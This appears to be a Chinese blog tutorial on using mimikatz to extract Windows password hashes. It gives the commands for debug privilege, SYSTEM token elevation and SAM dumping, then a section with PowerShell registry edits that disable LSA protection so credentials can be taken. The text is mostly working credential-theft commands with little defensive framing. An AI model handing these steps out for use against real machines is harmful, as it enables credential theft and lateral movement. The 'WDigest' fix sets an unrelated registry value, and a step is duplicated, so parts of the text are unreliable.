使用mimikatz获取windows密码凭证

工具:mimikatz

下载地址:https://github.com/gentilkiwi/mimikatz/releases

1、开启mimikatz。以管理员权限打开cmd,进入mimikatz相应操作系统的目录下,输入命令:

mimikatz.exe

 

2、提升权限,输入命令:

 privilege::debug

(如果出现以下报错:ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061 说明你不是管理员权限)

3、权限提升至 NT AUTHORITY\SYSTEM,输入命令:

 token::elevate

 3、权限提升至 NT AUTHORITY\SYSTEM,输入命令:

token::elevate

 4、获取到NTLM的hash,输入命令:

lsadump::sam

 

 

### MimikatzWindows 10 上获取密码返回 Null 的解决方案 在某些版本的 Windows 10 中,由于微软增强了安全机制,Mimikatz 可能无法正常提取明文密码或哈希值,这通常是因为启用了保护内存中的凭证功能[^1]。 为了绕过此限制并成功获取密码,建议采取以下方法: #### 方法一:禁用 LSA 保护 通过组策略编辑器或注册表来关闭LSA (Local Security Authority)进程的强制完整性级别。具体操作如下: ```powershell Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name "RunAsPPL" -Value 0 ``` 重启计算机使更改生效后再尝试使用 Mimikatz 提取凭据。 #### 方法二:利用 WDigest 明文存储漏洞 对于特定版本的操作系统,在默认情况下会阻止 wdigest.dll 加载从而影响 mimikatz 对于 NTLM hash 和 plaintext password 的读取。可以通过修改注册表重新启用它: ```powershell New-Item 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\CredentialsDelegation' -Force | Out-Null New-ItemProperty -path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\CredentialsDelegation\' -name AllowProtectedCreds -value 0 –PropertyType DWORD ``` 同样需要重启机器让配置更新。 #### 方法三:加载自定义模块 如果上述两种方式均不可行,则考虑编写或寻找适用于最新版系统的 Mimikatz 插件/补丁程序,这些插件可能已经针对新的防护措施进行了优化处理。 值得注意的是,以上所有操作都涉及到对操作系统核心组件的安全设置做出调整,因此仅限合法授权范围内测试环境内执行,并且应当充分评估潜在风险。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值